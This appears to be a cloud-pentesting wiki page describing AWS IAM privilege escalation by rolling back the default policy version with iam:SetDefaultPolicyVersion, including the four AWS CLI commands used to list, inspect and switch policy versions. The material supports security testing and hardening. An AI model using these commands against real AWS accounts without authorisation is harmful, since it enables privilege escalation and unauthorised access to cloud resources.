search
githubEdit

IAM Policy Rollback

hashtag
Dangerous Permission: iam:SetDefaultPolicyVersion

hashtag
iam:SetDefaultPolicyVersion is a potentially dangerous permission that AWS caution about using. A threat actor possessing this permission could potentially increase their access level by leveraging unused versions of existing policies. A threat actor with this permission would be able to switch the default policy to any other versions and potentially escalate their privileges. This is a simple example of direct self-escalation, with the identity being able to modify its own rights, depending on the permissions contained within other policy versions.

hashtag
Commands:

hashtag
1) List directly attached policies on our user

aws iam list-attached-user-policies --user-name USERNAME

hashtag
2) List versions of a specific policy

aws iam list-policy-versions --policy-arn POLICY_ARN

hashtag
3) Get a specific version of our chosen policy

aws iam get-policy-version --policy-arn POLICY_ARN --version-id vNUM

hashtag
4) Here we abuse the dangerous privilege to rollback to our desired policy version to gain further access to AWS resources or do Privilege Escalation

aws iam set-default-policy-version --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY_NAME --version-id vNUM
PreviousExploitationNextMetadata SSRF

Last updated